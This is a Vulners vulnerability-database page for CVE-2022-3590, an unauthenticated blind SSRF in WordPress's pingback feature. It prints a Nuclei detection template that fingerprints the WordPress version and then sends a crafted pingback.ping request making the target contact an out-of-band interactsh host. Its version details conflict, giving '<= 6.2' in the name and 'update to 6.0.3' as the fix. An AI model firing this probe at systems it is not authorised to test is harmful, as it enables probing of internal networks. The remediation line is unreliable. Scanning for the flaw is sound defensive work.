| Reporter | Title | Published | Views | Family All 22 |
|---|---|---|---|---|
| Exploit for Time-of-check Time-of-use (TOCTOU) Race Condition in Wordpress | 12 Jun 202313:06 | – | githubexploit | |
| Exploit for Time-of-check Time-of-use (TOCTOU) Race Condition in Wordpress | 8 Aug 202403:02 | – | githubexploit | |
| Exploit for Time-of-check Time-of-use (TOCTOU) Race Condition in Wordpress | 12 Jun 202313:06 | – | githubexploit | |
| CVE-2022-3590 | 14 Dec 202212:27 | – | circl | |
| WordPress 代码问题漏洞 | 14 Dec 202200:00 | – | cnnvd | |
| CVE-2022-3590 | 14 Dec 202208:33 | – | cve | |
| CVE-2022-3590 WP <= 6.1.1 - Unauthenticated Blind SSRF via DNS Rebinding | 14 Dec 202208:33 | – | cvelist | |
| CVE-2022-3590 | 14 Dec 202208:33 | – | debiancve | |
| CVE-2022-3590 | 14 Dec 202209:15 | – | nvd | |
| WordPress <= 6.4.1 SSRF Vulnerability | 15 Dec 202200:00 | – | openvas |
id: CVE-2022-3590
info:
name: WordPress <= 6.2 - Server Side Request Forgery
author: riteshs4hu
severity: medium
description: |
WordPress is affected by an unauthenticated blind SSRF in the pingback feature. Because of a TOCTOU race condition between the validation checks and the HTTP request, attackers can reach internal hosts that are explicitly forbidden.
impact: |
Unauthenticated attackers can exploit a race condition in the WordPress pingback feature to perform blind SSRF attacks, potentially accessing internal network resources, cloud metadata endpoints, or other restricted internal services that are explicitly forbidden by validation checks.
remediation: |
Update WordPress to version 6.0.3 or later that properly handles TOCTOU race conditions in the pingback feature.
reference:
- https://wpscan.com/vulnerability/c8814e6e-78b3-4f63-a1d3-6906a84c1f11
- https://www.sonarsource.com/blog/wordpress-core-unauthenticated-blind-ssrf/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 5.9
cve-id: CVE-2022-3590
cwe-id: CWE-367
epss-score: 0.0315
epss-percentile: 0.86326
cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: wordpress
product: wordpress
shodan-query:
- cpe:"cpe:2.3:a:wordpress:wordpress"
- http.component:"wordpress"
fofa-query: body="oembed" && body="wp-"
tags: cve,cve2022,wordpress,wpscan,ssrf,oast,oob,vkev,vuln
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers:
- type: regex
part: body
regex:
- 'WordPress\s+(?:[1-5]\.\d+(?:\.\d+)?|6\.[0-2](?:\.\d+)?)'
internal: true
- raw:
- |
POST /xmlrpc.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://{{interactsh-url}}/</string></value>
</param>
<param>
<value><string>{{RootURL}}/?p=1</string></value>
</param>
</params>
</methodCall>
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains_all(body, '<methodResponse>','faultCode','<fault>')"
- "contains(content_type, 'text/xml')"
- "contains(interactsh_protocol, 'dns')"
condition: and
# digest: 4a0a00473045022100ce552b2e9babc947c0d861c9ad2761744df4ad27f976dcdda3b015b283d8f25c0220763637d6f069ad6add6e062286e2407cdb441025344cf62f2be04c3a233ccb5c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation